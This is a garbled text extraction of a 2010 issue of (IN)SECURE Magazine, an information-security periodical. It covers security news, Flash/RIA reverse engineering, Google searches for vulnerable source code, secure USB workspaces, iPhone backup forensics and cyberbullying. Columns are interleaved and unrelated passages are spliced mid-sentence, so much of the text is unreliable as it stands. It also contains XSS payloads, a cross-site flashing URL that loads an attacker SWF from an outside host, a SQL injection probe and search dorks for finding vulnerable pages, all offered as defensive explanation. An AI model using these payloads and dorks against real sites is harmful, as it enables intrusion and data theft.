shutdown cell phone and Internet services to prevent a cascading effect, ... found being shipped to customers while cont
Itʼs been quite a ride since the April issue of (IN)SECURE. Weʼve been to Infosecurity Europe in London and met some of our dedicated readers across the channel. We took in the sun at the IBM Innovate 2010 conference in Orlando and learned more about the future of information security and other transformations coming to many aspects of our computing-fueled lifestyle. As this issue is released, weʼre looking forward to going to the US for one of the premier technical events of the year - Black Hat Briefings & Training 2010. If youʼre in Las Vegas, donʼt forget to join us for drinks at the Qualys party on July 28 at the Jet, itʼs going to be amazing! A big thanks goes to everyone who submitted their material for this issue, thereʼs truly a lot of talented people in the information security field. Keep it coming! Mirko Zorz Editor in Chief
Visit the magazine website at www.insecuremag.com
(IN)SECURE Magazine contacts Feedback and contributions: Mirko Zorz, Editor in Chief -
[email protected] News: Zeljka Zorz, News Editor -
[email protected] Marketing: Berislav Kucan, Director of Marketing -
[email protected]
Distribution (IN)SECURE Magazine can be freely distributed in the form of the original, non modified PDF document. Distribution of modified versions of (IN)SECURE Magazine content is prohibited without the explicit permission from the editor.
Copyright HNS Consulting Ltd. 2010. www.insecuremag.com
Google now supports encrypted search Google just rolled out SSL encryption to Google Search. The option is currently in beta, therefore the users aren't automatically transferred to https. Over the years, Google started adding SSL capabilities to their portfolio of online products, most notably making it the default option for all Gmail users in early 2010. (www.net-security.org/secworld.php?id=9323)
Wi-Fi security patent granted for dynamic authentication and encryption Ruckus Wireless has been granted a patent by the USPTO for an innovation that simplifies the configuration, administration and strength of wireless network security. The new technique effectively eliminates tedious and time-consuming manual installation of encryption keys, passphrases or user credentials needed to securely access a wireless network. (www.net-security.org/secworld.php?id=9326)
Findings of the Q1 2010 State of the Web security report Zscaler's newly released Q1 2010 State of the Web report details the enterprise threat landscape and the variety of Web-based issues plaguing Internet users. Among numerous findings, the report details several growing threat vectors, including attackers leveraging search engines and growing fake anti-virus threats. (www.net-security.org/secworld.php?id=9335) www.insecuremag.com !
!
5
Q&A: Symantec's acquisitions and the future Francis deSouza is senior vice president of the Enterprise Security Group at Symantec. In this interview he discusses Symantec's recent acquisitions, how they mitigate cloud computing and social networking threats, as well as Symantec's plans for the near future. (www.net-security.org/article.php?id=1442)
Critical vulnerabilities in Photoshop CS4 Critical vulnerabilities have been identified in Photoshop CS4 11.01 and earlier for Windows and Macintosh that could allow an attacker who successfully exploits these vulnerabilities to take control of the affected system. A malicious .ASL, .ABR, or .GRD file must be opened in Photoshop CS4 by the user for an attacker to be able to exploit these vulnerabilities. (www.net-security.org/secworld.php?id=9350)
Critical iPhone security issue leaves your contents exposed Bernd Marienfeld has discovered that the passcode protection can be bypassed by simply connecting the iPhone 3GS in question to a computer running Ubuntu 10.04. According to him, the iPhone can be tricked into allowing access to photos, videos, music, voice recordings, Google safe browsing > But an attacker can cause XSS by passing value like below. http://www.example.com/Banner.swf? clickTAG=javascript:alert('XSS') D. Exploit by ʻasfunction used in conjunction with unsafe Flash methodsʼ asfunction protocol handler is similar to the JavaScript protocol handler. asfunction causes an swf function in the Flash file to be executed. But there are a few unsafe functions in Flash listed on the following page: 19
- loadVariables() - loadMovie() - getURL() - loadMovie() - loadMovieNum() - FScrollPane.loadScrollContent() - LoadVars.load() - LoadVars.send() - LoadVars.sendAndLoad() - MovieClip.getURL() - MovieClip.loadMovie() - NetConnection.connect() - NetServices.createGatewayConnection() - NetSteam.play() - Sound.loadSound() - XML.load() - XML.send() - XML.sendAndLoad() An example of the script code would be: loadMovie(_root.URL) When such a function is intended to call upon other domains, it becomes unsafe because the parameter can be exploited easily in the following manner: http://www.example.com/test_flash. swf?URL=asfunction:loadMovie,javas cript:alert('XSS') All the other methods above can cause XSS in similar ways in Flash driven RIA. It is possible to dump the file, discover respective pointers and analyze it in ways similar to the ones described for the case of getURL earlier. Case Study 2: Cross Site Flashing with RIA XSF (Cross Site Flashing) is very similar to an XSS attack. The basic concept of XSF is loading of a movie by another movie. Here the application is designed to load only a safe .swf file specifically from its own server. But if an XSF point is discovered it is exploited by an attacker by forcing another file from an untrusted domain to be loaded. By using the XSF attack, the attacker can: • Load an XSS vulnerable Flash file or • Cause a phishing attack. The same functions as the ones listen above can lead to such XSF attacks. For example, consider that an application has code such as: www.insecuremag.com
loadMovieNum(_root.moviename, 1); An attacker here would inject his own movie and craft the URL to become: http://www.example.com/XSF?moviena me=http://www.xyz.com/xss.swf If the .swf file was to be dumped and the method searched for, this attack could be discovered. Case Study 3: Embedded SWF files within other SWF files – Deeper reverse engineering In many cases, certain .swf files are planted to work around a shallow level of disassembly. To avoid being caught by the reverse engineers, the malicious code is planted as a .swf file, but embedded in another .swf file. The parent file is designed to look relatively simpler and not hazardous. Only on closer inspection is the manipulation discovered. Once caught, the reverse engineering process can be done recursively for the child .swf file. Through many such levels the final malicious file can hidden and found as well. The main purpose of this case study is to show the recursive aspects of the reverse engineering approach. Consider an .swf file like the one mentioned above where the malicious code is not directly available in the output of the first dump. Running SWFDump on it merely gives an output where one can see a large list of bytes have been pushed directly onto the stack by commands like: xxxxx) + Y:Z pushbyte XX The bytes could continue to be pushed to a large number and consider a case where they are then stored in some array by a command such as: xxxxx) + Y:Z newarray wwwww params xxxxx) + Y:Z setproperty [public]::array where in all the three above commands x,Y,Z denote individual integers (different values in each command likely).
20
When looking for the “array” in the remaining dump, one may find the mechanism that uses these bytes and decrypts them by - for example - using a string key stored initially by a regular XOR loop or any other such mechanism. Therefore, the pushes can be extracted in a separate file and analyzed. From there, the bytes pushed may be extracted to a separate file. Analyzing the mechanism of the code that was found around the decrypting part of the “array”, it is not very difficult to guess the kind of decryption used. Hence, a script in Perl, Python or their likes can be manually written to decrypt the extracted bytes imitating the same way as was found in the parent SWFDump to decrypt it. On decrypting, the result could be another .swf file. Running a second SWFDump on this file is then required. If large hex strings are found to be pushed into the local registers in one of these dumps, these can be analyzed by trying to convert them to a binary file using another manual script. It would not be surprising if these large hex strings were also additional .swf files themselves. At some point, SWFDump may fail to decrypt when it hits some malware exploit
containing codes. Hereafter - with some knowledge of what to look for and the opcodes that SWFDump cannot parse - it is possible to find the problem manually. For example, the opcodes can be read as an .asm file and the mechanism of the exploit can then be analyzed. The crux of this study is that reverse engineering may not always stop at level 0. Depending on the first output, the suspicious codes that do not make sense must be re-analyzed and, if need be, extracted by using small scripts and then once again reverse engineered. II. Protocol analysis It is also possible to identify the service point and server side access points from Flash components. The subject Flash component may be communicating over AMF, JSON or XML to these back end components (as discussed in the previous section on architecture). These back end streams can be fuzzed and the attacker can discover a potential vulnerability. For example, consider the following login component (written using Flex).
Figure 9 – Simple login in Flex.
We can dump this .swf by SWFDump and look for the service point for this example:
Figure 10 – Flash message brokerʼs end points. www.insecuremag.com
21
The message brokerʼs end point can be identified and the stream either reconstructed or manipulated by proxy thereafter. For example,
Charleʼs Proxy provides AMF decoding and the following screenshots describe its working mechanisms.
Figure 11 – AMF passing username and password admin/admin.
At this point it is easy to fuzz the stream and a simple single quote can be passed as shown below.
Figure 12 – Adding quote in the request.
Along with the stack, here is the response:
Figure 13 – Stack trace showing injection. www.insecuremag.com
22
Here, the stack trace shows a possible SQL injection. An attacker can leverage this particular point and exploit the server side components from here using the AMF stream. Conclusion and prospects In this paper, we have focused on the security analysis of Flash components. The need for security analysis has been explained in the context of the current information era (Web 2.0). An attempt to see a small set of vulnerabilities has been made, along with trying to apply the discussed approach in tackling it. A second approach of protocol analysis has also been presented. It is possible to extend the same approaches to look out for other security loopholes such as: • Assumption of clientsʼ behavior - for example, expecting the client to enter only plain text as required in a textfield and hence provide no
validation is too simplistic and has a major loophole wherein the client may inject executable JavaScript code in the same textfield. • Disclosure of business logic and secrets on the client side, i.e. the username-password authentication logic may have been deployed as a client side ActionScript in the .swf file itself. In such a case, a simple decompiler like SWFScan could be used to reverse engineer the .swf file and this, in turn, would give away the ActionScript which has cleartext username-password combinations. Such avenues for the use of reverse engineering Flash based Rich Internet Applications are many and the idea of this paper is to open the eyes of the readers to reverse engineering and protocol analysis based Flash security with enough examples and tools after which the application of this approach may be considered by individuals and modified to suit their own scenario.
Rishita Anubhai is a Web Security Researcher at Blueinfy. Shivang Bhagat is a Security Consultant at Blueinfy.
www.insecuremag.com
23
What is a log? Without getting too philosophical, a log is a record of some activity occurring at or observed by an information system or application. Sometimes a collection of such log messages will also be called a log or a log file. Given this definition, the log ;
`"+request.getParameter("Category")+"` order
rs=stmt.executeQuery(query);
Finding Cross-Site Scripting (XSS) vulnerabilities In this next example, locating a page that contains XSS vulnerabilities is just as easily
achievable as in our previous example. In this instance, the search is explicitly locating files of your choice; this example narrows our search to “index.jsp” exclusively.
inurl:index.jsp intext:request.getparameter() Our search criteria returned a number of results that located “index.jsp” pages with the API of “getParameter”. The API is used to return the value of a request parameter passed
as query string. A manual review of 10 pages revealed 67 XSS (persistent and reflected) vulnerabilities.
UFirstName = request.getParameter("FirstName"); The provided examples reveal the easiness of locating vulnerabilities. The vulnerability search is not limited to XSS and SQLi. Utilizing other unsafe APIs will provide the same results: OS execution (Runtime.getRuntime) or vulnerabilities associated with other programming techniques such as PHP, Perl, ASP (for instance, inurl:default.asp intext:Response.Write). The benefit of reviewing source code is proved when one attempts to bypass the pro-
tective measures. For instance, the ability to review the constructed input validation allows for the ability to evade the validation. In addition, source code comments help to explain the internal workings of the application and to identify business logic vulnerabilities. I like the saying “What is old, is new again”. When you think about it, the techniques described within this article use the same approach we have been witnessing for years, but weʼre introducing the ability to locate vulnerabilities “under the radar”.
Jerry Mangiarelli is an IT Security Specialist with TD Bank Financial Group. He has spent the last 9 years assessing and researching web applications. He continues to present his research techniques and results at many seminars and conferences, such as EC-Council, SecTor and Federation of Security Professionals. www.insecuremag.com
48
SOURCE Barcelona 2010 (www.sourceconference.com) Barcelona, Spain, 21-22 September 2010. Use discount code SOURCEHN10 to get 15% off your ticket price.
Brucon 2010 (www.brucon.org) Brussels, Belgium. 24-25 September 2010. RSA Conference Europe 2010 (bit.ly/rsa2010eu) London, United Kingdom. 12-14 October 2010.
InfoSecurity Russia 2010 (www.infosecurityrussia.ru) Moscow, Russia. 17-19 November 2010.
Securecomm 2010 (www.securecomm.org) Singapore. 7-10 September 2010.
Gartner Security & Risk Management Summit (europe.gartner.com/security) London. 22-23 September 2010.
2nd International ICST Conference on Digital Forensics & Cyber Crime (www.d-forensics.org) Abu Dhabi, UAE. 4-10 October 2010.
ISSE 2010 (www.isse.eu.com) Berlin, Germany. 5-7 October 2010.
GRC Meeting 2010 - Lisbon/Portugal (www.grc-meeting.com) Lisbon, Portugal. 28-29 October 2010. www.insecuremag.com
49
Infosecurity Europe is held every year in London. The event provides a free education program, exhibitors showcasing new and emerging technologies and offering practical and professional expertise. (IN)SECURE Magazine was at the show and here are some images from the show floor.
www.insecuremag.com
51
This year's show was the busiest and most successful show to date with 324 exhibitors on the show floor and 12,556 unique visitors through the door (excludes exhibitors and repeat visits).
The keynote program addressed the security issues and pressures that organizations face in an increasingly mobile and global working environment. Leading security experts, industry innovators and speakers from the end-user community provided expert analysis, real-life case studies, strategic advice and predictions. The program included speakers from eBay, Lloyds, Camelot, Lufthansa, Network Rail and Barclays.
www.insecuremag.com
52
Remote workers dream of accessing their files and applications anytime, anywhere. But how do you stop that dream from becoming a security nightmare? Hereʼs a look at the evolution of secure virtual workspaces. Over the past decade, enterprises have experienced a significant increase in workforce mobility. Employees routinely connect to their offices from home PCs via VPN connections, use wireless hotspots in airports, and receive work emails on smartphone devices. Whatʼs more, organizations are offering access to partner and contractors. While this drive for “anytime, anywhere” access to applications and resources offers advantages in terms of productivity and efficiency, it also introduces a number of significant security risks to the enterprise. First, thereʼs the diversity of remote access methods being used for business. Some employees will use company laptops or home PCs to connect to the office via VPN links; some will process work emails on smartphones or handheld devices. Another group may use wireless hotspots or Internet kiosks in public areas, or log in from PCs at partner or customer sites.
laptops and smartphones are all too easily lost or stolen, and often lack encryption – making them easy prey for thieves. Information such as passwords, login credentials, and sensitive files can be left behind on untrusted devices at the end of a remote access session, making it available to subsequent users. And of course thereʼs the everpresent threat of malware, spyware and malicious attacks, both from the web and from unsecured PCs. Last, but by no means least, thereʼs the sheer cost of owning and managing a fleet of corporate laptops or portable devices, to allow mobile working. These costs include the purchase price, software licensing, security applications, managing updates and patches, repairs and replacements, and so on. The checklist for remote working Businesses need a solution that:
Some of these remote endpoints are fully managed and under the control of the business IT team; others may be completely insecure and unmanaged. Extending secure access across this wide range of methods and devices is a headache for any organization.
• Gives flexible and secure access to information resources and applications from almost any location and type of PC.
Second, enterprises need to protect their sensitive company or customer information data against the risks of data breaches. Corporate
• And is cheaper to deploy and manage than a traditional laptop PC, to help reduce the total cost of ownership (TCO).
www.insecuremag.com
• Keeps sensitive data secure at all times against loss, theft or hacking.
53
Ideally, the solution should also work seamlessly and transparently for remote workers, so they can use their time productively. Users shouldnʼt have to waste time on issues such as unnecessary re-authentication or connection issues when using VPNs. Nor should they have to remember to encrypt individual files or documents when they are copying or saving their work. The solution must also be unobtrusive in action, so it doesnʼt interfere with the userʼs activities, while applying security to protect against external threats and the userʼs own mistakes or oversights.
remove keystroke loggers, Trojan horses and crimeware.
Meeting this checklist of requirements could be fearsomely complex if conventional point security products were used – such as separate VPN, anti-virus, encryption, personal firewalling and intrusion prevention.
• Cache cleaning on the remote PC at the sessionʼs end, to erase browser history, downloaded files, clipboard items and so on. Together with encryption, this helps to remove most traces of the session.
However, the introduction of virtualization technology in recent years has led to the development of a new approach, which greatly reduces complexity of remote access security, while simplifying central management and ergonomics for the user. This is the secure workspace concept.
However, while this on-demand approach is very useful in both enforcing security and enabling relatively flexible remote access, it isnʼt a perfect solution. What happens if the remote computer doesnʼt pass the endpoint compliance scan, and isnʼt allowed to connect to the corporate network? In that case, the user cannot access the data or applications that they need, inhibiting their ability to work – unless they can find an alternative PC that meets compliance requirements.
Endpoint security on-demand This concept was first introduced some four years ago, as a feature on advanced remote access gateways. These gateways were able to deliver ʻendpoint security on demandʼ to the userʼs remote PC, by combining two processes: endpoint compliance and secure workspace.
If the remote PC passes the endpoint compliance process, then the secure workspace is established, to give session confidentiality through the VPN tunnel. This includes: • An encrypted SSL VPN session with the remote PC, to protect data input and processed while connected. This ensures that no usable information remains on the PC when the session ends.
Another issue is that the remote session only gives VPN access to certain permitted applications. It doesnʼt give the user access to their desktop PC as if they were actually in the office.
The endpoint compliance process includes:
Online and offline security
• Policy enforcement — the gateway scans the remote PC prior to granting access, and enforces access policies according to the results of the scan. This enables matching of access rights to the level the remote PC can be trusted, and includes factors such as whether security software like antivirus and firewall applications are installed and running, and determines whether the latest Windows patches have been installed.
Whatʼs needed is an extension of the ondemand approach, which enables the user to get secure access to their desktop, and the corporate network, from any PC, no matter how insecure it is, and no matter what malware or other infections it may be carrying.
• Guest computer security checks — once policy enforcement is complete, a remote malware scan can be performed to identify and
www.insecuremag.com
Further, if the user cannot set up a VPN session from the remote PC theyʼre using, due to connection constraints for example, why not enable secure offline access to their desktop and data? If this secure workspace can be made easily portable, fully managed and with always-on, tamper-proof encryption, so much the better. 54
A secure PC in your pocket For a number of years now, having a personal ʻPC on a flash driveʼ has been an option for users. The main reason is that multi-gigabit USB thumb drives are readily affordable. For example, IT magazines regularly run features on how to create a bootable flash drive that contains your preferred applications and data, allowing you to carry your PC in your pocket. Because of security concerns, this method has not, until now, been recommended for corporate deployments. Conventional flash drives do not easily support remote access or security applications, such as anti-virus and encryption. Nor do they support centralized management. However, secure flash drives are now available with on-
board, automated hardware encryption. This imposes mandatory access control on all files written to the drive, storing them in a private partition that is strongly encrypted and password-protected. They can also lock down automatically when a specified number of incorrect password attempts are made, to secure stored data in the event of drive loss or theft. These secure drives also support central management by enterprise IT teams. This means that drive usage can be monitored, complete with records of files written to and from the drives (which helps with reprovisioning new drives for users in the event of loss or theft). Some drives also support remote termination, which renders them unusable if misplaced or stolen.
WHY NOT USE A SECURE DRIVE AS THE PLATFORM FOR A PORTABLE, VIRTUAL WORKSPACE SOLUTION? Desktop-to-go Creating the secure, virtual workspace Why not use a secure drive as the platform for a portable, virtual workspace solution? When inserted into the USB port of any PC, the solution could transform the host into a temporary, trusted endpoint with a secure VPN connection to the corporate network. The solution should present the user with the same Windows desktop that they have in their office, complete with preferred shortcuts and access to documents. These files can be manipulated using the host PCʼs office applications, while the userʼs data remains secure in the separate, secure virtual workspace that runs parallel to the host environment. This would protect the integrity of both local data and the corporate network, shielding it against malware, hacking attempts and data loss or theft. But how should the data security components of a secure flash drive be extended to deliver thus functionality? How do we enable remote access and secure, sandboxed sessions on the host machine, generated from the userʼs flash drive while keeping the process simple and transparent for the user? Letʼs take a closer look at how this can be achieved. www.insecuremag.com
The goal when creating a virtual workspace is to protect the userʼs session on the host PC by enclosing it in a “bubble of security” as soon as the session starts up. In this case, the session starts when the user inserts their secure USB drive into the host machine. The secure flash driveʼs firmware would contain both a login program and a virtualization engine. Upon insertion, the login program launches and is granted access to the flash drive firmware, where the userʼs sensitive information is stored. The user is then presented with a login screen, where they enter their security credentials. Following a successful login, the virtualization engine creates a new virtual file system as the basis for the secure workspace, and an instance of the Explorer.exe file is started within this virtual system. All subsequent processes will be started as “child” processes of this new Explorer.exe file. This allows applications and the VPN session to be controlled inside the newly-created secure workspace on the host PC. 55
This process, called precision emulation, means there is no large installation on the host PC and much lower system memory consumption. In turn, this boosts performance, and means there is no need for the user to track or manage multiple operating systems or file systems. The virtualization engine automatically maintains the virtual system it creates. Precision emulation and hooking The Microsoft Windows NT dynamic-link library (NTDLL) acts as a barrier between the user environment and the host PCʼs system kernel. The precision emulation process performs a special sort of hooking on this barrier, intercepting application code execution before it reaches the NTDLL. This process redirects all file and registry input/output (I/O) calls for the applications being used inside the secure workspace – such as Web browsing, word processing, spreadsheets and so on – to the userʼs flash drive. This means all applications running inside the new secure virtual workspace, including the new Explorer.exe, operate in a virtual file system and registry. The virtual files and all registry data are written to the flash drive instantly, and immediately encrypted. If an application requests file creation inside the secure workspace, the CreateFile Win32 API function is called. This call is intercepted and the file is actually created within the flash driveʼs file system. In effect, this means a secure channel to the applications stored on the host PC is created. This way, the hostʼs applications can used to create and edit files, but data is not transferred to, nor available on, the host PC. This special hooking does not require the installation a driver component. It dramatically reduces the potential for conflicts between the secure virtual workspace and the software applications on unmanaged computers. In this architecture, the memory spaces of applications within the secure workspace and those of ordinary applications on the host PC are not separated, which avoids memory con-
flicts. In addition to NTDLL, several other Microsoft Windows dynamic-link libraries are hooked in the same manner, to provide additional security. Data defenses: Leaving no traces The methods described above show how the secure, virtual workspace is created and managed, enabling the user to take advantage of the host PCʼs applications, while ensuring the userʼs data does not touch the host. When the user ends the session, the secure virtual workspace disappears, and because all user and registry data is written to the flash drive and encrypted, never reaching the host PC, no trace of the session or of the VPN connection remains. Even when the solution is not in use, all sensitive user information is encrypted on the flash drive, so user credentials, information contained in documents, and other sensitive data remain protected if the device is lost. Additional desirable features include antikeylogging, to protect against malware on the host PC that may records keystrokes, and the ability to enforce and manage specific security policies. Policies should cover the copying of files from the secure workspace to the host PC, printing of files, and the use of certain applications. The key to plug-in security With this solution, enterprises can provide employees, contractors and partners with a consistent, controlled, encrypted and secure virtual workspace -- completely independent of the host computer. Security teams have the ability to enforce mandatory access control on all files, which are stored in a hardwareencrypted, password-protected partition to enable compliance with privacy regulations. This USB-based solution is far less expensive to purchase and manage than a fleet of laptops, and automatically applies and enforces security without the userʼs intervention. All together, it delivers a pocket-sized, secure work environment, whether the user is online or offline.
Nick Lowe is head of Western Europe sales for Check Point (www.checkpoint.com). He is an expert across IT security, from technology development and evolving threats to compliance and security reporting. www.insecuremag.com
56
iPhones have been in use for a while now, and many are backing them up to either their own machines or to a machine owned by their current employer. I'm here to talk about an option you are offered when backing up your iPhone – the Encrypt iPhone backup:
I have an iPhone with a few applications installed, and I regularly sync it with my MacBook Pro. I have a lot of contacts, calendar entries and various application data on the iPhone. One day, my car and everything inside it is stolen - including my Mac Book. Unfortunately for me, the thieves are not just computer savvy, they're part of a large crime syndicate that's been targeting not just me but my entire organization for a while now. They know that I am in charge of the security team that safeguards my company's secrets, and they know that I am a Mac/iPhone user because I have mentioned it in various posts, tweets and regular Facebook updates.
www.insecuremag.com
Getting started I don't use my MacBook for work, so it is not protected quite as well as my work machine. It is also not protected by File Vault, because I prefer the simplicity of Time Machine as a backup solution. When I first synced my new iPhone with my Mac, I did not check the box that said "Encrypt Backups...". Consequently, the ~/ Library/Application Support/MobileSync/ Backup/xxx directory holds the unencrypted backup files for my iPhone.
58
Basic structure and files The xxx portion of the directory structure is a unique identifier for my iPhone. It is not related to the IMEI number or anything as dubious as that, but it can be matched to the iPhone. Within that directory, a very large amount of files (made up primarily of .mdinfo and .mddata files) is stored. There are also three files that stand out like a sore thumb:
It seems that there are quite a few different files here. The images could be somewhat intriguing, but it's the SQLite databases and
www.insecuremag.com
Info.plist Manifest.plist Status.plist But more on those later. First of all, let's take a look at those .mdinfo and .mddata files. There are enough of them to warrant a quick exploration with some bash/sed/awk/file magic:
XML documents that will prove to be the most interesting:
59
Luckily for me, the file names don't give anything away. The file extensions are related, though. A quick Google search can tell the thieves that each .mdinfo file has a relating .mddata file and that they're created by the iPhone/ iTunes backup process.
One can clearly see a file name with the associated path in that output, and that could lead to the assumption that this is an image taken with the iPhone camera. It still doesn't provide information such as geo-location data, but I'm sure the exif data will be a veritable treasure trove. Plist files: friend, enemy or just a very noisy neighbor? Before we dig any deeper into the backup files and start poking around the SQL databases, let's take a look at those three files we flagged at the very beginning. First off, we have the Info.plist file. For those of you who are new to the OS, the plist file is a "Property List" file and holds information about applications and the like. In this case, it holds various information about my iPhone. It's a simple, easy-to-read XML formatted file, from which a lot of information about the iPhone can be learned: • Build Version • Device Name • IMEI number • Last Backup Date • Serial Number • Target Identifier (which matches our backup directory magic number) • iTunes Version.
www.insecuremag.com
Take the ffe6ddb2ac75ba5b561690c59aafdf5b6001bce 4.mddata file as an example. A quick "file" on that can reveal it's "JPEG image data, EXIF standard", which indicates that the file is indeed a JPEG. If "strings" is run on the relating .mdinfo file, interesting information will come to light:
There are also a bunch of base64 encoded files within the plist file. Free beers to the person who can decode them and tell (IN)SECURE Magazine what they contain (beer will be provided by the author and not the magazine.) Next up is the Manifest.plist file. It contains four keys: • AuthSignature • AuthVersion • Data • IsEncrypted ! This file is used as a manifest for the backups to check for file corruption. Again, it looks like the Data portion is encoded in base64, but I haven't had the chance to verify this. Finally, we have the Status.plist file, which contains one key: Backup Success ! Not really useful for anything other than time stamping the last successful backup of the iPhone. The meat and potatoes Now that we've gone through the basics and found where we can get information about the iPhone (as well as grab any images that were held on the device), it's time to dig into the SQLite databases. 60
On my backup there were quite a few of them - 37 in total. The SQLite databases hold all sorts of information about applications on the iPhone, the SMS database, the contacts database, as well as things like the Calls database. Since the files are not encrypted, extracting information from them is extremely easy.
.dump - Dump entire database out. .tables - Describe the tables in the database. SELECT - You should know basic SQL statements by now. Probably the most interesting thing are the phone Call logs. If we do a "SELECT * FROM calls", we get a similar table:
The commands we're going to use here are:
As you can see, the logs are all kept in a neat fashion. What's more, you can see exactly what happened during those calls. Through a
little trial and error I came up with the following analysis of the entries. If I am wrong, please feel free to correct me.
Position one is the call number in the database. This will increase sequentially after more calls are made.
figure out the significance of these numbers so if anyone has more information, please let me know.
Position two is the actual number that was dialed.
The other SQLite databases of interest are the Notes databases. If you're really lucky, you can find notes on passwords to servers, IP addresses and all the usual stuff people want to store but don't think to store it in something that should be encrypted.
Position three is the epoch time when the call was made. A simple bit of perl (perl -e 'print scalar(gmtime(1256804172)), "\n"') will give you the time in numbers us humans can read. Position four is the duration of the call in seconds. I haven't been able to figure out yet position five. It flips between a 4 or a 5 and there doesn't seem to be a relation to the type of call made. If anyone knows the answer to this, please feel free to get in touch with me. I believe position six to be the status of the call. If the call is missed, the field is filled with "-1". However when the call is successful it's filled with either 358, 398, 388 or 348. I can't www.insecuremag.com
There's also the SMS database, which is very similar to the Calls database. It contains fields denoting message status, number of the sender and the like – a great source of information on your target. Finally there are databases on installed applications. Is the iPhone owner using Facebook? The Facebook database has all the contacts of that user. There isn't anything juicy like usernames or passwords, but there are links to the contacts profile picture.
61
This is presumably used by the application for the profile picture. Not very useful for anything other than stalking. Probably the biggest headache of the SQLite databases is that they cannot be easily identified. The file names look like a SHA1 hash, so finding out what a SQLite database contains is a trial and error process. You could script a lot of it which would make life a lot easier.
While it can be argued that getting hold of a laptop with this sort of setup in place is a little difficult (nearly impossible some would say), you just have to look at the stats of lost laptops at airports to see that the possibility is there.
At the end of the day, an unencrypted backup of an iPhone is a treasure chest just waiting to be opened and dug through. The amount of information that can be found out about a target simply by digging through the various files with simple Unix/Linux tools is astonishing.
It takes an insignificant amount of effort to be a little more secure and you will be thanking your lucky stars when your machine is stolen. Most of the time the machines are probably wiped and reinstalled for resale, but these days, you never know who is after what.
The moral of this story? Encrypt. Everything. Always.
Matt Erasmus is an info-sec professional, packet junkie and Mac addict from South Africa.
www.insecuremag.com
62
As many children wrap up another school year, Iʼm reminded of the fact that for most, the past few months have left them with fond and lasting memories of friends, achievements and milestones – memories that they will cherish in later years. The problem of cyber bullying, however, makes this assumption invalid for a growing number of students. Today, this problem is far worse than when school children picked on kids during recess periods and inside the schoolyard, because the perpetrators of computer-generated taunts can now access their victims 24 hours a day, seven days a week. The numbers are staggering. The National Crime Prevention Council released this eyeopening statistics in 2007: • More than 40 percent of all teenagers with Internet access have reported being bullied online. • A mere 10 percent of those kids who were bullied told their parents about the incident, and that only 18 percent of the cases were reported to a local or national law enforcement agency.
www.insecuremag.com
• Fifty-eight percent of 4th through 8th graders reported having mean or cruel things said to them online. 53 percent said that they have said mean or hurtful things to others while online. 42 percent of those studied said they had been “bullied online”, but almost 60 percent never told their parents about the incident. • Ten percent of 770 young people surveyed were made to feel “threatened, embarrassed or uncomfortable” by a photo taken of them using a cell-phone camera. While schools canʼt watch students around the clock, they can at least ensure that their networks, just like their playgrounds, are safe for kids. Protection against these kinds of attacks is arguably more critical for educational institutions than ensuring personal data is not compromised, because the negative impact of cyber bullying can have far greater implications. 64
Take 15-year old Phoebe P., for example. The Massachusetts teenager committed suicide last January, after having been the recipient of a continuous barrage of mean online messages and emails. Action is most certainly required. So, here are some effective strategies educators should implement to counter cyber bullying before the beginning of the new school year. • Start using strong email/IM gateway filtering platforms. Internal school emails and IM chat platforms are the easiest way for bullies to access their victims. Thankfully, there are costeffective, robust turnkey systems on the market that can plug into existing systems and set up a virtually impenetrable wall between the perpetrators and their targets.
• Make sure everyone knows youʼre watching and on the job. Most criminal acts (cyber bullying included) are conducted in secrecy. Shedding light on the perpetratorsʼ activities by telling them that theyʼre being watched is a great tactic in this particular situation. • Call for backup. Schools and educators should not have to fight cyber bullies alone, but rather get help from their system integrators and product vendors. The best partners are the ones who have offerings that specifically counter current and future attacks of this nature. This scourge must end, and teachers, principals and parents are the ones who must do it. Itʼs time they had the tools and experts at their disposal to make it happen.
Max Huang is the founder and CEO of O2Security (www.o2security.com), a manufacturer of network security appliances and disaster recovery offerings. He can be reached at
[email protected].
www.insecuremag.com
65
Tracks Eraser Pro (www.net-security.org/software.php?id=268) Tracks Eraser Pro is a privacy cleaner that can clean up all Internet tracks and other activity trails on your computer. With only one click, Tracks Eraser Pro allows you to erase the browser cache, cookies (with option to keep certain ones), history, typed URLs, auto-complete memory as well as index.dat from your browser, and Windows temp folders, run history, search history, open/save history, recent documents and more.
DSPAM (www.net-security.org/software.php?id=582) DSPAM is an extremely scalable, open-source statistical anti-spam filter. While most commercial solutions only claim a mere 95% accuracy (1 error in 20), a majority of DSPAM users frequently see around 99.95% (1 error in 2000) and can sometimes reach peaks as high as 99.991% (2 errors in 22,786, as with one particular user).
Samhain (www.net-security.org/software.php?id=125) Samhain is an open source file integrity and host-based intrusion detection system. It can run as a daemon process, and and thus can remember file changes - contrary to a tool that runs from cron, if a file is modified you will get only one report, while subsequent checks of that file will ignore the modification as it is already reported (unless the file is modified again).
Server Inspector (www.net-security.org/software.php?id=574) Server Inspector is a professional monitoring tool. You can monitor Windows services, websites, applications, files, drives, hosts and databases. In case of an emergency Server Inspector can notify you via e-mail, SMS or a network message.
www.insecuremag.com
66
One of the most valuable benefits of the Internet is its ability to foster high levels of information sharing and collaboration. Not only has the Internet enabled massive efficiency gains for when it comes to managing complex supply chains, it is in and of itself a supply chain for the distribution of information. The ability to engage online has provided government agencies with a wealth of strategic opportunities, especially when it comes to leveraging employees, partners and contractors in ways that might not feasible outside of cyberspace. However, stringent security and compliance requirements require government agencies to maintain strong controls over how information and people are managed online - and be able to demonstrate that those controls are always in place. So how do IT departments manage the catch-22 of opening up their networks to strategic third parties without risk of exposing critical systems or data? From a technology perspective, the major shift that needs to occur is to design and implement controls from a user-centric point of view. While this might not sound like a big deal, network security is by nature devicecentric. Letʼs look at some real world scenarios where a user or an identity-based approach to access control becomes a huge business enabler. www.insecuremag.com
Outsourcing: Outsourcing is one of the most mature use cases for third-party access control. Managed security services, which are just a portion of the overall managed services market, was estimated by Forrester to be a $3 billion industry in 2008, and provides a good example of why a company would want an outsider to have unfettered access to critical systems. Outsourcing the daily management of critical infrastructure can save companies a significant amount of time and money. But with the rewards of outsourcing come new risks, such as opening up the network to your outsourcing partner. This risk is amplified by the fact that users tend to be technically savvy and require access to critical systems. If they wanted to do harm they are well positioned to do so, and if they make a mistake it could have significant repercussions. !
!
68
